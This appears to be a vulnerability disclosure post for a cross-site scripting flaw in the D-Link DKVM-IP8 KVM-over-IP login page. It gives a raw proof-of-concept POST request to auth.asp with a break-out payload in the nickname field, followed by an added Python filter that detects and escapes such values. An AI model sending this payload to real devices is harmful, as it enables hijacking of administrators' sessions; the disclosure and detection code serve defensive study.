D-LINK XSS Vulnerability (DKVM-IP8)

A cross-site scripting (XSS) vulnerability has recently been uncovered on the D-Link DKVM-IP8. Proof of concept code is available at the bottom of this post.
About the D-Link DKVM-IP8
DKVM-IP8 defines a new class of remote KVM access device; it combines digital remote KVM access via IP networks with comprehensive and integrated system management. DKVM-IP8 offers convenient remote KVM access and control via LAN or Internet. It captures, digitizes, and compresses video and transmits it with keyboard and mouse signals to and from a remote computer. It also provides a non-intrusive solution for remote access and control. Remote access and control software runs only on its embedded processors, not on mission-critical servers, so there is no interference with server operation or impact on network performance.
/*
Exploit Title: D-LINK DKVM-IP8 XSS Vulnerability
Software Link: http://www.dlink.ru/
Version: 2282_dlinkA4_p8_20071213
Tested on: Windows Sp 2
Site : http://Hacking.ge
Code :
*/
POST http://site.com:80/auth.asp HTTP/1.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)
Host: 212.58.116.80
Content-Length: 90
Connection: Close
Pragma: no-cache
Attack details
The POST variable nickname has been set to 1>">">
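
An added example, not part of the original post or the device firmware: a Python check that a reverse proxy or log-review script in front of the KVM could run on POST bodies sent to auth.asp. It flags nickname values containing HTML break-out characters and shows the HTML-escaped form a fixed page would emit. The function names and sample bodies are constructed for illustration.

```python
import html
from urllib.parse import parse_qs, unquote

# Characters that let a reflected value break out of an HTML attribute or tag.
HTML_BREAKOUT = set('<>"\'')


def decode_fully(value, max_rounds=3):
    """Undo repeated percent-encoding so %253E is treated like '>'."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def inspect_auth_post(path, body):
    """Return findings for a form-encoded POST to auth.asp; empty list means clean."""
    # Accept both "/auth.asp" and the absolute-URL form used in the request above.
    if not path.lower().split("?", 1)[0].endswith("/auth.asp"):
        return []
    findings = []
    # parse_qs performs the first round of URL decoding.
    for name, values in parse_qs(body, keep_blank_values=True).items():
        if name.lower() != "nickname":
            continue
        for once_decoded in values:
            value = decode_fully(once_decoded)
            bad = sorted(HTML_BREAKOUT & set(value))
            if bad:
                findings.append({
                    "param": name,
                    "value": value,
                    "chars": bad,
                    # What the server should write into the page instead.
                    "escaped": html.escape(value, quote=True),
                })
    return findings


if __name__ == "__main__":
    # Constructed sample bodies; the first encodes the nickname value shown above.
    samples = [
        "nickname=1%3E%22%3E%22%3E",
        "nickname=1%253E%2522",  # double-encoded variant
        "nickname=alice",        # benign
    ]
    for body in samples:
        print(body, "->", inspect_auth_post("/auth.asp", body))
```
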
